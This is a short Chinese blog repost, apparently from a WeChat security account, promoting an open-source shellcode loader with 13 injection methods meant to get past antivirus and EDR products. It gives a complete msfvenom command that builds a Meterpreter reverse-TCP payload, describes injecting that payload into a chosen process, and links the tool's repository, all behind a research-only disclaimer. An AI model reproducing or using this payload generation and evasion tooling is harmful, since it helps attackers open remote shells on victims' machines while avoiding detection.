0x01 工具介绍
0x02 安装与使用
该模块一共携带13种shellcode加载方式,由于AV/EDR是实时更新的,开源工具显然不能有效地绕过高级AV/EDR,或许某些加载模块仍然可以绕过Microsoft Defender,但是大部分ShellcodeLoader已经被高级AV/EDR抓住(例如Kaspersky、Norton、Bitdefender、ESET Nod32......),这也是我选择将它们开源的原因,以CobaltStrike/Metasploit的攻击载荷为例,您需要生成stager/stageless的bin文件,CobaltStrike:
Metasploit:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.0 LPORT=4488 -f raw -o payload.bin 公众号:web安全工具库
依次选择注入模式、payload、要注入的进程即可在桌面生成二进制文件。
其它语言的loader也是大同小异,只要有编程环境就可以编译成功。
0x03 项目链接下载
https://github.com/INotGreen/GlllPowerloader
原文始发于微信公众号(网络安全者):绕过AV/EDR的代码例子
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论